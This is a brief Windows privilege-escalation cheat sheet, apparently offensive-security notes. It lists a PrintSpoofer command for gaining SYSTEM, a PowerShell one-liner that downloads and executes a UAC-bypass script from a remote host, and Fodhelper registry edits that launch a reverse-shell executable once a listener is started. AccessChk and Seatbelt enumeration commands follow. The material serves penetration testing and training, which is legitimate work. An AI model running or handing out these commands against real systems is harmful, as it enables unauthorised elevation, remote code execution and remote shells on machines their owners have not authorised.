# Privilege Escalation

### SeImpersonatePrivilege

[PrintSpoofer](https://github.com/itm4n/PrintSpoofer)

```
PrintSpoofer64.exe -i -c powershell
```

Use the above command to get system privileges

**UAC**

* [UACBypass.ps1](https://gist.github.com/mattifestation/b4072a066574caccfa07fcf723952d54)

```
iex(new-object net.webclient).downloadstring('http://192.168.1.1/uacbypass.ps1');alt
```

* Fodhelper UAC Bypass

```
Use these commands in powershell session:

New-Item "HKCU:\Software\Classes\ms-settings\shell\open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "Delega-
teExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -
Value "powershell.exe -exec bypass -c C:\Windows\Tasks\reverse-shell.exe" -Force
```

Start a listener to catch the shell and now execute fodhelper.exe

```
C:\Windows\System32\fodhelper.exe
```

**AccessChk**

```
accesschk.exe "currentuser" C:\Windows -wus
accesschk.exe -ucqv servicename
```

**SeatBelt**

```
Seatbelt.exe -group=user
```